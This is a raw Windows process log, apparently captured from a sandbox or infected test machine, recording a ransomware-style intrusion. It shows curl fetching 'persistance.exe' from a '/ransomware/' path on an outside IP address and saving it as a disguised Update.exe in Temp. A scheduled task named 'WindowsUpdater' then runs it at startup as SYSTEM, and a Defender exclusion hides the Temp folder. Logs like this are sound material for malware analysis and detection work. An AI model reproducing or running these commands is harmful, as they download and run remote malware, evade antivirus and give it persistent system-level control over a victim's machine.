schtasks.exe schtasks /QUERY /TN "WindowsUpdater"
2728 cmd.exe C:\Windows\system32\cmd.exe /c curl -s 130.61.181.50/ransomware/persistance.exe > C:\Users\test22\AppData\Local\Temp\Update.exe
2776 curl.exe curl -s 130.61.181.50/ransomware/persistance.exe
2820 cmd.exe C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONSTART /RL HIGHEST /F /RU SYSTEM /TN "WindowsUpdater" /TR "C:\Users\test22\AppData\Local\Temp\Update.exe" 1>NUL 2>NUL
2896 schtasks.exe SCHTASKS /CREATE /SC ONSTART /RL HIGHEST /F /RU SYSTEM /TN "WindowsUpdater" /TR "C:\Users\test22\AppData\Local\Temp\Update.exe"
2940 cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp"
2992 powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp"
3036 cmd.exe C:\Windows\system32\cmd.exe /c cls
2196